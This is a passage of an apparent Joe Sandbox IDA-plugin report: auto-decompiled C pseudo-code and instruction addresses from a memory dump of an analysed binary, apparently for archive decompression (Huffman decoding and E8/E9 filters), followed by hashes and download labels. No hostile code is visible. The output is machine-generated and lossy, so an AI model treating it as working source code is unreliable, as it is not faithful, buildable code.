				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t264;
				signed short _t265;
				unsigned int _t269;
				unsigned int _t274;
				signed int _t279;
				signed short _t280;
				signed int _t284;
				void* _t291;
				signed int _t293;
				signed int* _t295;
				signed int _t296;
				signed int _t297;
				signed int _t301;
				signed int _t304;
				signed int _t305;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t313;
				intOrPtr _t314;
				signed int _t315;
				unsigned int _t318;
				void* _t320;
				signed int _t323;
				signed int _t324;
				unsigned int _t327;
				void* _t329;
				signed int _t332;
				void* _t335;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t341;
				void* _t342;
				signed int _t345;
				signed int* _t349;
				signed int _t350;
				unsigned int _t354;
				void* _t356;
				signed int _t359;
				void* _t363;
				signed int _t366;
				signed int _t367;
				unsigned int _t370;
				void* _t372;
				signed int _t375;
				intOrPtr* _t377;
				void* _t378;
				signed int _t381;
				void* _t384;
				signed int _t388;
				signed int _t389;
				intOrPtr* _t391;
				void* _t392;
				signed int _t395;
				void* _t398;
				signed int _t401;
				signed int _t402;
				intOrPtr* _t404;
				void* _t405;
				signed int _t408;
				signed int _t414;
				unsigned int _t416;
				unsigned int _t420;
				signed int _t423;
				signed int _t424;
				unsigned int _t426;
				unsigned int _t430;
				signed int _t433;
				signed int _t434;
				void* _t435;
				signed int _t436;
				intOrPtr* _t438;
				signed char _t440;
				signed int _t442;
				intOrPtr _t443;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				void* _t455;

				_t440 =  *(_t455 + 0x38);
				 *(_t455 + 0x18) = __ecx;
				if( *((char*)(_t440 + 0x2c)) != 0) {
					L3:
					_t313 =  *((intOrPtr*)(_t440 + 0x18));
					_t438 = _t440 + 4;
					__eflags =  *_t438 -  *((intOrPtr*)(_t440 + 0x24)) + _t313;
					if( *_t438 <=  *((intOrPtr*)(_t440 + 0x24)) + _t313) {
						 *(_t440 + 0x4ad8) =  *(_t440 + 0x4ad8) & 0x00000000;
						_t201 =  *((intOrPtr*)(_t440 + 0x20)) - 1 + _t313;
						_t414 =  *((intOrPtr*)(_t440 + 0x4acc)) - 0x10;
						 *(_t455 + 0x18) = _t201;
						 *(_t455 + 0x14) = _t414;
						_t293 = _t201;
						__eflags = _t201 - _t414;
						if(_t201 >= _t414) {
							_t293 = _t414;
						}
						 *(_t455 + 0x10) = _t293;
						while(1) {
							_t314 =  *_t438;
							__eflags = _t314 - _t293;
							if(_t314 < _t293) {
								goto L15;
							}
							L9:
							__eflags = _t314 - _t201;
							if(__eflags > 0) {
								L93:
								L94:
								return _t201;
							}
							if(__eflags != 0) {
								L12:
								__eflags = _t314 - _t414;
								if(_t314 < _t414) {
									L14:
									__eflags = _t314 -  *((intOrPtr*)(_t440 + 0x4acc));
									if(_t314 >=  *((intOrPtr*)(_t440 + 0x4acc))) {
										L92:
										 *((char*)(_t440 + 0x4ad3)) = 1;
										goto L93;
									}
									goto L15;
								}
								__eflags =  *((char*)(_t440 + 0x4ad2));
								if( *((char*)(_t440 + 0x4ad2)) == 0) {
									goto L92;
								}
								goto L14;
							}
							_t201 =  *(_t440 + 8);
							__eflags = _t201 -  *((intOrPtr*)(_t440 + 0x1c));
							if(_t201 >=  *((intOrPtr*)(_t440 + 0x1c))) {
								goto L93;
							}
							goto L12;
							L15:
							_t315 =  *(_t440 + 0x4adc);
							__eflags =  *(_t440 + 0x4ad8) - _t315 - 8;
							if( *(_t440 + 0x4ad8) > _t315 - 8) {
								_t284 = _t315 + _t315;
								 *(_t440 + 0x4adc) = _t284;
								_push(_t284 * 0xc);
								_push( *(_t440 + 0x4ad4));
								_t310 = E010235DE(_t315, _t414);
								__eflags = _t310;
								if(_t310 == 0) {
									E01006EFD(0x1040f50);
								}
								 *(_t440 + 0x4ad4) = _t310;
							}
							_t203 =  *(_t440 + 0x4ad8);
							_t295 = _t203 * 0xc +  *(_t440 + 0x4ad4);
							 *(_t455 + 0x28) = _t295;
							 *(_t440 + 0x4ad8) = _t203 + 1;
							_t205 = E0100A800(_t438);
							_t206 =  *(_t440 + 0xb4);
							_t416 = _t205 & 0x0000fffe;
							__eflags = _t416 -  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4));
							if(_t416 >=  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4))) {
								_t442 = 0xf;
								_t207 = _t206 + 1;
								__eflags = _t207 - _t442;
								if(_t207 >= _t442) {
									L27:
									_t318 =  *(_t438 + 4) + _t442;
									 *(_t438 + 4) = _t318 & 0x00000007;
									_t209 = _t318 >> 3;
									 *_t438 =  *_t438 + _t209;
									_t320 = 0x10;
									_t443 =  *((intOrPtr*)(_t455 + 0x20));
									_t323 =  *((intOrPtr*)(_t440 + 0x74 + _t442 * 4)) + (_t416 -  *((intOrPtr*)(_t440 + 0x30 + _t442 * 4)) >> _t320 - _t442);
									__eflags = _t323 -  *((intOrPtr*)(_t440 + 0x30));
									asm("sbb eax, eax");
									_t210 = _t209 & _t323;
									__eflags = _t210;
									_t324 =  *(_t440 + 0xcb8 + _t210 * 2) & 0x0000ffff;
									goto L28;
								}
								_t404 = _t440 + 0x34 + _t207 * 4;
								while(1) {
									__eflags = _t416 -  *_t404;
									if(_t416 <  *_t404) {
										break;
									}
									_t207 = _t207 + 1;
									_t404 = _t404 + 4;
									__eflags = _t207 - 0xf;
									if(_t207 < 0xf) {
										continue;
									}
									goto L27;
								}
								_t442 = _t207;
								goto L27;
							} else {
								_t405 = 0x10;
								_t436 = _t416 >> _t405 - _t206;
								_t408 = ( *(_t436 + _t440 + 0xb8) & 0x000000ff) +  *(_t438 + 4);
								 *_t438 =  *_t438 + (_t408 >> 3);
								 *(_t438 + 4) = _t408 & 0x00000007;
								_t324 =  *(_t440 + 0x4b8 + _t436 * 2) & 0x0000ffff;
								L28:
								__eflags = _t324 - 0x100;
								if(_t324 >= 0x100) {
									__eflags = _t324 - 0x106;
									if(_t324 < 0x106) {
										__eflags = _t324 - 0x100;
										if(_t324 != 0x100) {
											__eflags = _t324 - 0x101;
											if(_t324 != 0x101) {
												_t212 = 3;
												 *_t295 = _t212;
												_t295[2] = _t324 - 0x102;
												_t214 = E0100A800(_t438);
												_t215 =  *(_t440 + 0x2d78);
												_t420 = _t214 & 0x0000fffe;
												__eflags = _t420 -  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4));
												if(_t420 >=  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4))) {
													_t296 = 0xf;
													_t216 = _t215 + 1;
													__eflags = _t216 - _t296;
													if(_t216 >= _t296) {
														L85:
														_t327 =  *(_t438 + 4) + _t296;
														 *(_t438 + 4) = _t327 & 0x00000007;
														_t218 = _t327 >> 3;
														 *_t438 =  *_t438 + _t218;
														_t329 = 0x10;
														_t332 =  *((intOrPtr*)(_t440 + 0x2d38 + _t296 * 4)) + (_t420 -  *((intOrPtr*)(_t440 + 0x2cf4 + _t296 * 4)) >> _t329 - _t296);
														__eflags = _t332 -  *((intOrPtr*)(_t440 + 0x2cf4));
														asm("sbb eax, eax");
														_t219 = _t218 & _t332;
														__eflags = _t219;
														_t220 =  *(_t440 + 0x397c + _t219 * 2) & 0x0000ffff;
														L86:
														_t297 = _t220 & 0x0000ffff;
														__eflags = _t297 - 8;
														if(_t297 >= 8) {
															_t221 = 3;
															_t446 = (_t297 >> 2) - 1;
															_t301 = ((_t297 & _t221 | 0x00000004) << _t446) + 2;
															__eflags = _t446;
															if(_t446 != 0) {
																_t223 = E0100A800(_t438);
																_t335 = 0x10;
																_t301 = _t301 + (_t223 >> _t335 - _t446);
																_t338 =  *(_t438 + 4) + _t446;
																 *_t438 =  *_t438 + (_t338 >> 3);
																_t339 = _t338 & 0x00000007;
																__eflags = _t339;
																 *(_t438 + 4) = _t339;
															}
														} else {
															_t301 = _t297 + 2;
														}
														( *(_t455 + 0x28))[1] = _t301;
														L91:
														_t414 =  *(_t455 + 0x18);
														_t201 =  *(_t455 + 0x1c);
														_t293 =  *(_t455 + 0x10);
														_t443 =  *((intOrPtr*)(_t455 + 0x20));
														while(1) {
															_t314 =  *_t438;
															__eflags = _t314 - _t293;
															if(_t314 < _t293) {
																goto L15;
															}
															goto L9;
														}
													}
													_t341 = _t440 + 0x2cf8 + _t216 * 4;
													while(1) {
														__eflags = _t420 -  *_t341;
														if(_t420 <  *_t341) {
															break;
														}
														_t216 = _t216 + 1;
														_t341 = _t341 + 4;
														__eflags = _t216 - 0xf;
														if(_t216 < 0xf) {
															continue;
														}
														goto L85;
													}
													_t296 = _t216;
													goto L85;
												}
												_t342 = 0x10;
												_t423 = _t420 >> _t342 - _t215;
												_t345 = ( *(_t423 + _t440 + 0x2d7c) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t345 >> 3);
												 *(_t438 + 4) = _t345 & 0x00000007;
												_t220 =  *(_t440 + 0x317c + _t423 * 2) & 0x0000ffff;
												goto L86;
											}
											 *_t295 = 2;
											L33:
											_t414 =  *(_t455 + 0x18);
											_t201 =  *(_t455 + 0x1c);
											_t293 =  *(_t455 + 0x10);
											continue;
										}
										_push(_t455 + 0x2c);
										E01013952(_t443, _t438);
										_t295[1] =  *(_t455 + 0x2c) & 0x000000ff;
										_t295[2] =  *(_t455 + 0x30);
										_t424 = 4;
										 *_t295 = _t424;
										_t233 =  *(_t440 + 0x4ad8);
										_t349 = _t233 * 0xc +  *(_t440 + 0x4ad4);
										 *(_t440 + 0x4ad8) = _t233 + 1;
										_t349[1] =  *(_t455 + 0x38) & 0x000000ff;
										 *_t349 = _t424;
										_t349[2] =  *(_t455 + 0x34);
										goto L33;
									}
									_t237 = _t324 - 0x106;
									__eflags = _t237 - 8;
									if(_t237 >= 8) {
										_t350 = 3;
										_t304 = (_t237 >> 2) - 1;
										_t237 = (_t237 & _t350 | 0x00000004) << _t304;
										__eflags = _t237;
									} else {
										_t304 = 0;
									}
									_t447 = _t237 + 2;
									 *(_t455 + 0x14) = _t447;
									__eflags = _t304;
									if(_t304 != 0) {
										_t274 = E0100A800(_t438);
										_t398 = 0x10;
										_t401 =  *(_t438 + 4) + _t304;
										 *(_t455 + 0x14) = _t447 + (_t274 >> _t398 - _t304);
										 *_t438 =  *_t438 + (_t401 >> 3);
										_t402 = _t401 & 0x00000007;
										__eflags = _t402;
										 *(_t438 + 4) = _t402;
									}
									_t240 = E0100A800(_t438);
									_t241 =  *(_t440 + 0xfa0);
									_t426 = _t240 & 0x0000fffe;
									__eflags = _t426 -  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4));
									if(_t426 >=  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4))) {
										_t305 = 0xf;
										_t242 = _t241 + 1;
										__eflags = _t242 - _t305;
										if(_t242 >= _t305) {
											L49:
											_t354 =  *(_t438 + 4) + _t305;
											 *(_t438 + 4) = _t354 & 0x00000007;
											_t244 = _t354 >> 3;
											 *_t438 =  *_t438 + _t244;
											_t356 = 0x10;
											_t359 =  *((intOrPtr*)(_t440 + 0xf60 + _t305 * 4)) + (_t426 -  *((intOrPtr*)(_t440 + 0xf1c + _t305 * 4)) >> _t356 - _t305);
											__eflags = _t359 -  *((intOrPtr*)(_t440 + 0xf1c));
											asm("sbb eax, eax");
											_t245 = _t244 & _t359;
											__eflags = _t245;
											_t246 =  *(_t440 + 0x1ba4 + _t245 * 2) & 0x0000ffff;
											goto L50;
										}
										_t391 = _t440 + 0xf20 + _t242 * 4;
										while(1) {
											__eflags = _t426 -  *_t391;
											if(_t426 <  *_t391) {
												break;
											}
											_t242 = _t242 + 1;
											_t391 = _t391 + 4;
											__eflags = _t242 - 0xf;
											if(_t242 < 0xf) {
												continue;
											}
											goto L49;
										}
										_t305 = _t242;
										goto L49;
									} else {
										_t392 = 0x10;
										_t434 = _t426 >> _t392 - _t241;
										_t395 = ( *(_t434 + _t440 + 0xfa4) & 0x000000ff) +  *(_t438 + 4);
										 *_t438 =  *_t438 + (_t395 >> 3);
										 *(_t438 + 4) = _t395 & 0x00000007;
										_t246 =  *(_t440 + 0x13a4 + _t434 * 2) & 0x0000ffff;
										L50:
										_t247 = _t246 & 0x0000ffff;
										__eflags = _t247 - 4;
										if(_t247 >= 4) {
											_t308 = (_t247 >> 1) - 1;
											_t247 = (_t247 & 0x00000001 | 0x00000002) << _t308;
											__eflags = _t247;
										} else {
											_t308 = 0;
										}
										_t250 = _t247 + 1;
										 *(_t455 + 0x24) = _t250;
										_t448 = _t250;
										__eflags = _t308;
										if(_t308 == 0) {
											L68:
											__eflags = _t448 - 0x100;
											if(_t448 > 0x100) {
												_t253 =  *(_t455 + 0x14) + 1;
												 *(_t455 + 0x14) = _t253;
												__eflags = _t448 - 0x2000;
												if(_t448 > 0x2000) {
													_t254 = _t253 + 1;
													 *(_t455 + 0x14) = _t254;
													__eflags = _t448 - 0x40000;
													if(_t448 > 0x40000) {
														_t255 = _t254 + 1;
														__eflags = _t255;
														 *(_t455 + 0x14) = _t255;
													}
												}
											}
											_t251 =  *(_t455 + 0x28);
											 *_t251 = 1;
											_t251[1] =  *(_t455 + 0x14);
											_t251[2] = _t448;
											goto L91;
										} else {
											__eflags = _t308 - 4;
											if(__eflags < 0) {
												_t256 = E0101815A(_t438);
												_t363 = 0x20;
												_t448 = (_t256 >> _t363 - _t308) +  *(_t455 + 0x24);
												_t366 =  *(_t438 + 4) + _t308;
												 *_t438 =  *_t438 + (_t366 >> 3);
												_t367 = _t366 & 0x00000007;
												__eflags = _t367;
												 *(_t438 + 4) = _t367;
												goto L68;
											}
											if(__eflags > 0) {
												_t269 = E0101815A(_t438);
												_t384 = 0x24;
												_t448 = (_t269 >> _t384 - _t308 << 4) +  *(_t455 + 0x24);
												_t388 =  *(_t438 + 4) + 0xfffffffc + _t308;
												 *_t438 =  *_t438 + (_t388 >> 3);
												_t389 = _t388 & 0x00000007;
												__eflags = _t389;
												 *(_t438 + 4) = _t389;
											}
											_t259 = E0100A800(_t438);
											_t260 =  *(_t440 + 0x1e8c);
											_t430 = _t259 & 0x0000fffe;
											__eflags = _t430 -  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4));
											if(_t430 >=  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4))) {
												_t309 = 0xf;
												_t261 = _t260 + 1;
												__eflags = _t261 - _t309;
												if(_t261 >= _t309) {
													L65:
													_t370 =  *(_t438 + 4) + _t309;
													 *(_t438 + 4) = _t370 & 0x00000007;
													_t263 = _t370 >> 3;
													 *_t438 =  *_t438 + _t263;
													_t372 = 0x10;
													_t375 =  *((intOrPtr*)(_t440 + 0x1e4c + _t309 * 4)) + (_t430 -  *((intOrPtr*)(_t440 + 0x1e08 + _t309 * 4)) >> _t372 - _t309);
													__eflags = _t375 -  *((intOrPtr*)(_t440 + 0x1e08));
													asm("sbb eax, eax");
													_t264 = _t263 & _t375;
													__eflags = _t264;
													_t265 =  *(_t440 + 0x2a90 + _t264 * 2) & 0x0000ffff;
													goto L66;
												}
												_t377 = _t440 + 0x1e0c + _t261 * 4;
												while(1) {
													__eflags = _t430 -  *_t377;
													if(_t430 <  *_t377) {
														break;
													}
													_t261 = _t261 + 1;
													_t377 = _t377 + 4;
													__eflags = _t261 - 0xf;
													if(_t261 < 0xf) {
														continue;
													}
													goto L65;
												}
												_t309 = _t261;
												goto L65;
											} else {
												_t378 = 0x10;
												_t433 = _t430 >> _t378 - _t260;
												_t381 = ( *(_t433 + _t440 + 0x1e90) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t381 >> 3);
												 *(_t438 + 4) = _t381 & 0x00000007;
												_t265 =  *(_t440 + 0x2290 + _t433 * 2) & 0x0000ffff;
												L66:
												_t448 = _t448 + (_t265 & 0x0000ffff);
												goto L68;
											}
										}
									}
								}
								__eflags =  *(_t440 + 0x4ad8) - 1;
								if( *(_t440 + 0x4ad8) <= 1) {
									L34:
									 *_t295 =  *_t295 & 0x00000000;
									_t295[2] = _t324;
									_t295[1] = 0;
									goto L33;
								}
								__eflags =  *(_t295 - 0xc);
								if( *(_t295 - 0xc) != 0) {
									goto L34;
								}
								_t279 =  *(_t295 - 8) & 0x0000ffff;
								_t435 = 3;
								__eflags = _t279 - _t435;
								if(_t279 >= _t435) {
									goto L34;
								}
								_t280 = _t279 + 1;
								 *(_t295 - 8) = _t280;
								 *((_t280 & 0x0000ffff) + _t295 - 4) = _t324;
								_t68 = _t440 + 0x4ad8;
								 *_t68 =  *(_t440 + 0x4ad8) - 1;
								__eflags =  *_t68;
								goto L33;
							}
						}
					}
					 *((char*)(_t440 + 0x4ad0)) = 1;
					goto L94;
				} else {
					 *((char*)(_t440 + 0x2c)) = 1;
					_push(_t440 + 0x30);
					_push(_t440 + 0x18);
					_push(_t440 + 4);
					_t291 = E01013D6D(__ecx);
					if(_t291 != 0) {
						goto L3;
					} else {
						 *((char*)(_t440 + 0x4ad0)) = 1;
						return _t291;
					}
				}
			}

0x01016a80
0x01016a86
0x01016a8e
0x01016ab5
0x01016ab8
0x01016abe
0x01016ac1
0x01016ac3
0x01016adb
0x01016ae2
0x01016ae4
0x01016ae7
0x01016aeb
0x01016af0
0x01016af2
0x01016af4
0x01016af6
0x01016af6
0x01016af8
0x01016afc
0x01016afc
0x01016afe
0x01016b00
0x00000000
0x00000000
0x01016b02
0x01016b02
0x01016b04
0x0101707b
0x0101707c
0x00000000
0x0101707c
0x01016b0a
0x01016b18
0x01016b18
0x01016b1a
0x01016b29
0x01016b29
0x01016b2f
0x01017074
0x01017074
0x00000000
0x01017074
0x00000000
0x01016b2f
0x01016b1c
0x01016b23
0x00000000
0x00000000
0x00000000
0x01016b23
0x01016b0c
0x01016b0f
0x01016b12
0x00000000
0x00000000
0x00000000
0x01016b35
0x01016b35
0x01016b3e
0x01016b44
0x01016b46
0x01016b49
0x01016b52
0x01016b53
0x01016b5e
0x01016b62
0x01016b64
0x01016b6b
0x01016b6b
0x01016b70
0x01016b70
0x01016b76
0x01016b81
0x01016b88
0x01016b8c
0x01016b92
0x01016b99
0x01016b9f
0x01016ba5
0x01016ba9
0x01016bd6
0x01016bd7
0x01016bd8
0x01016bda
0x01016bf3
0x01016bf6
0x01016bfd
0x01016c00
0x01016c03
0x01016c0b
0x01016c14
0x01016c18
0x01016c1a
0x01016c1d
0x01016c1f
0x01016c1f
0x01016c21
0x00000000
0x01016c21
0x01016bdf
0x01016be2
0x01016be2
0x01016be4
0x00000000
0x00000000
0x01016be6
0x01016be7
0x01016bea
0x01016bed
0x00000000
0x00000000
0x00000000
0x01016bef
0x01016bf1
0x00000000
0x01016bab
0x01016bad
0x01016bb0
0x01016bba
0x01016bc2
0x01016bc7
0x01016bca
0x01016c29
0x01016c2e
0x01016c30
0x01016c7e
0x01016c84
0x01016ef7
0x01016ef9
0x01016f4a
0x01016f50
0x01016f5f
0x01016f60
0x01016f6a
0x01016f6d
0x01016f74
0x01016f7a
0x01016f80
0x01016f87
0x01016fb4
0x01016fb5
0x01016fb6
0x01016fb8
0x01016fd4
0x01016fd7
0x01016fde
0x01016fe1
0x01016fe4
0x01016fef
0x01016ffb
0x01016ffd
0x01017003
0x01017005
0x01017005
0x01017007
0x0101700f
0x0101700f
0x01017012
0x01017015
0x01017023
0x01017026
0x0101702e
0x01017031
0x01017033
0x01017037
0x0101703e
0x01017046
0x01017048
0x0101704f
0x01017051
0x01017051
0x01017054
0x01017054
0x01017017
0x01017017
0x01017017
0x0101705b
0x0101705f
0x0101705f
0x01017063
0x01017067
0x0101706b
0x01016afc
0x01016afc
0x01016afe
0x01016b00
0x00000000
0x00000000
0x00000000
0x01016b00
0x01016afc
0x01016fc0
0x01016fc3
0x01016fc3
0x01016fc5
0x00000000
0x00000000
0x01016fc7
0x01016fc8
0x01016fcb
0x01016fce
0x00000000
0x00000000
0x00000000
0x01016fd0
0x01016fd2
0x00000000
0x01016fd2
0x01016f8b
0x01016f8e
0x01016f98
0x01016fa0
0x01016fa5
0x01016fa8
0x00000000
0x01016fa8
0x01016f52
0x01016c5f
0x01016c5f
0x01016c63
0x01016c67
0x00000000
0x01016c67
0x01016f01
0x01016f03
0x01016f0d
0x01016f15
0x01016f1a
0x01016f1b
0x01016f1d
0x01016f26
0x01016f2d
0x01016f38
0x01016f40
0x01016f42
0x00000000
0x01016f42
0x01016c8a
0x01016c90
0x01016c93
0x01016ca0
0x01016ca3
0x01016ca9
0x01016ca9
0x01016c95
0x01016c95
0x01016c95
0x01016cab
0x01016cae
0x01016cb2
0x01016cb4
0x01016cb8
0x01016cbf
0x01016cc9
0x01016ccb
0x01016cd4
0x01016cd6
0x01016cd6
0x01016cd9
0x01016cd9
0x01016cde
0x01016ce5
0x01016ceb
0x01016cf1
0x01016cf8
0x01016d25
0x01016d26
0x01016d27
0x01016d29
0x01016d45
0x01016d48
0x01016d4f
0x01016d52
0x01016d55
0x01016d60
0x01016d6c
0x01016d6e
0x01016d74
0x01016d76
0x01016d76
0x01016d78
0x00000000
0x01016d78
0x01016d31
0x01016d34
0x01016d34
0x01016d36
0x00000000
0x00000000
0x01016d38
0x01016d39
0x01016d3c
0x01016d3f
0x00000000
0x00000000
0x00000000
0x01016d41
0x01016d43
0x00000000
0x01016cfa
0x01016cfc
0x01016cff
0x01016d09
0x01016d11
0x01016d16
0x01016d19
0x01016d80
0x01016d80
0x01016d83
0x01016d86
0x01016d96
0x01016d99
0x01016d99
0x01016d88
0x01016d88
0x01016d88
0x01016d9b
0x01016d9c
0x01016da0
0x01016da2
0x01016da4
0x01016eb2
0x01016eb2
0x01016eb8
0x01016ebe
0x01016ebf
0x01016ec3
0x01016ec9
0x01016ecb
0x01016ecc
0x01016ed0
0x01016ed6
0x01016ed8
0x01016ed8
0x01016ed9
0x01016ed9
0x01016ed6
0x01016ec9
0x01016edd
0x01016ee5
0x01016eeb
0x01016eef
0x00000000
0x01016daa
0x01016daa
0x01016dad
0x01016e8e
0x01016e97
0x01016e9f
0x01016ea3
0x01016eaa
0x01016eac
0x01016eac
0x01016eaf
0x00000000
0x01016eaf
0x01016db3
0x01016db7
0x01016dc0
0x01016dce
0x01016dd2
0x01016dd9
0x01016ddb
0x01016ddb
0x01016dde
0x01016dde
0x01016de3
0x01016dea
0x01016df0
0x01016df6
0x01016dfd
0x01016e2a
0x01016e2b
0x01016e2c
0x01016e2e
0x01016e4a
0x01016e4d
0x01016e54
0x01016e57
0x01016e5a
0x01016e65
0x01016e71
0x01016e73
0x01016e79
0x01016e7b
0x01016e7b
0x01016e7d
0x00000000
0x01016e7d
0x01016e36
0x01016e39
0x01016e39
0x01016e3b
0x00000000
0x00000000
0x01016e3d
0x01016e3e
0x01016e41
0x01016e44
0x00000000
0x00000000
0x00000000
0x01016e46
0x01016e48
0x00000000
0x01016dff
0x01016e01
0x01016e04
0x01016e0e
0x01016e16
0x01016e1b
0x01016e1e
0x01016e85
0x01016e88
0x00000000
0x01016e88
0x01016dfd
0x01016da4
0x01016cf8
0x01016c32
0x01016c39
0x01016c70
0x01016c70
0x01016c75
0x01016c78
0x00000000
0x01016c78
0x01016c3b
0x01016c3f
0x00000000
0x00000000
0x01016c41
0x01016c47
0x01016c48
0x01016c4b
0x00000000
0x00000000
0x01016c4d
0x01016c4e
0x01016c55
0x01016c59
0x01016c59
0x01016c59
0x00000000
0x01016c59
0x01016ba9
0x01016afc
0x01016ac5
0x00000000
0x01016a90
0x01016a93
0x01016a97
0x01016a9b
0x01016a9f
0x01016aa0
0x01016aa7
0x00000000
0x01016aa9
0x01016aa9
0x00000000
0x01016aa9
0x01016aa7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac3e7d6cc43eb327c2b11a41e0d125344c726ea3bef1ae619c76d0b2136153af
Instruction ID: 2c1a97deee207be17b2904cc52836bc36f4d433a227ffb95dbe0bad7c1844551
Opcode Fuzzy Hash: ac3e7d6cc43eb327c2b11a41e0d125344c726ea3bef1ae619c76d0b2136153af
Instruction Fuzzy Hash: C612C2B16007068BC729CF28C9D06B9B7E1FF44308F14892EE5D7C7A89D7B9A895CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0100BE13, Relevance: .4, Instructions: 449
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0100BE13(signed int* __ecx) {
				void* __edi;
				signed int _t194;
				char _t197;
				void* _t204;
				signed char _t205;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				intOrPtr _t219;
				signed int _t221;
				signed int _t223;
				void* _t234;
				signed int _t235;
				signed int _t238;
				signed int _t266;
				void* _t267;
				void* _t268;
				void* _t269;
				void* _t270;
				void* _t271;
				signed int _t274;
				intOrPtr _t275;
				void* _t276;
				signed char* _t277;
				signed int _t278;
				signed int _t279;
				signed int _t281;
				char _t282;
				signed int _t284;
				signed char _t285;
				signed char _t289;
				void* _t290;
				intOrPtr _t292;
				signed int _t293;
				signed char* _t297;
				signed int _t304;
				signed int _t306;
				signed int _t308;
				signed int _t309;
				signed char _t310;
				intOrPtr _t311;
				void* _t312;
				void* _t313;
				unsigned int _t316;
				signed int _t317;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed char _t323;
				signed int _t324;
				signed int _t325;
				void* _t326;
				void* _t327;
				void* _t328;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed char* _t334;
				signed int _t335;
				signed int _t336;
				signed int _t338;
				unsigned int _t340;
				signed int _t345;
				void* _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				void* _t354;
				void* _t355;

				_t311 =  *((intOrPtr*)(_t355 + 4));
				_t339 = __ecx;
				if(_t311 <= 0) {
					L15:
					return 1;
				}
				if(_t311 <= 2) {
					_t194 = __ecx[5];
					_t284 =  *__ecx;
					_t340 = __ecx[7];
					_t276 = _t194 - 4;
					if(_t276 > 0x3fffc) {
						L98:
						return 0;
					}
					_t326 = 0;
					_t197 = (_t194 & 0xffffff00 | _t311 == 0x00000002) + 0xe8;
					 *((char*)(_t355 + 0x13)) = _t197;
					if(_t276 == 0) {
						goto L15;
					} else {
						goto L88;
					}
					do {
						L88:
						_t312 =  *_t284;
						_t284 = _t284 + 1;
						_t327 = _t326 + 1;
						_t340 = _t340 + 1;
						if(_t312 == 0xe8 || _t312 == _t197) {
							_t313 =  *_t284;
							if(_t313 >= 0) {
								_t191 = _t313 - 0x1000000; // -16777215
								if(_t191 < 0) {
									 *_t284 = _t313 - _t340;
								}
							} else {
								if(_t340 + _t313 >= 0) {
									_t190 = _t313 + 0x1000000; // 0x1000001
									 *_t284 = _t190;
								}
							}
							_t197 =  *((intOrPtr*)(_t355 + 0x13));
							_t284 = _t284 + 4;
							_t326 = _t327 + 4;
							_t340 = _t340 + 4;
						}
					} while (_t326 < _t276);
					goto L15;
				}
				if(_t311 == 3) {
					_t277 =  *__ecx;
					_t328 = __ecx[5] - 0x15;
					if(_t328 > 0x3ffeb) {
						goto L98;
					}
					_t316 = __ecx[7] >> 4;
					 *(_t355 + 0x2c) = _t316;
					if(_t328 == 0) {
						goto L15;
					}
					_t331 = (_t328 - 1 >> 4) + 1;
					 *(_t355 + 0x38) = _t331;
					do {
						_t204 = ( *_t277 & 0x1f) - 0x10;
						if(_t204 < 0) {
							goto L84;
						}
						_t205 =  *((intOrPtr*)(_t204 + 0x103e070));
						if(_t205 == 0) {
							goto L84;
						}
						_t332 =  *(_t355 + 0x2c);
						_t285 = 0;
						_t317 = _t205 & 0x000000ff;
						 *(_t355 + 0x34) = 0;
						 *(_t355 + 0x40) = _t317;
						_t350 = 0x12;
						do {
							if((_t317 & 1) != 0) {
								_t175 = _t350 + 0x18; // 0x2a
								if(E0100C37C(_t277, _t175, 4) == 5) {
									E0100C3C7(_t277, E0100C37C(_t277, _t350, 0x14) - _t332 & 0x000fffff, _t350, 0x14);
								}
								_t317 =  *(_t355 + 0x3c);
								_t285 =  *(_t355 + 0x30);
							}
							_t285 = _t285 + 1;
							_t350 = _t350 + 0x29;
							 *(_t355 + 0x30) = _t285;
						} while (_t350 <= 0x64);
						_t331 =  *(_t355 + 0x38);
						_t316 =  *(_t355 + 0x2c);
						L84:
						_t277 =  &(_t277[0x10]);
						_t316 = _t316 + 1;
						_t331 = _t331 - 1;
						 *(_t355 + 0x2c) = _t316;
						 *(_t355 + 0x38) = _t331;
					} while (_t331 != 0);
					goto L15;
				}
				if(_t311 == 4) {
					_t215 = __ecx[1];
					_t289 = __ecx[5];
					_t333 = __ecx[2];
					 *(_t355 + 0x20) = _t215;
					_t278 = _t215 - 3;
					 *(_t355 + 0x30) = _t289;
					 *(_t355 + 0x3c) = _t278;
					 *(_t355 + 0x44) = _t333;
					if(_t289 - 3 > 0x1fffd || _t278 > _t289 || _t333 > 2) {
						goto L98;
					} else {
						_t217 =  *__ecx;
						 *(_t355 + 0x2c) = _t217;
						_t351 = _t217 + _t289;
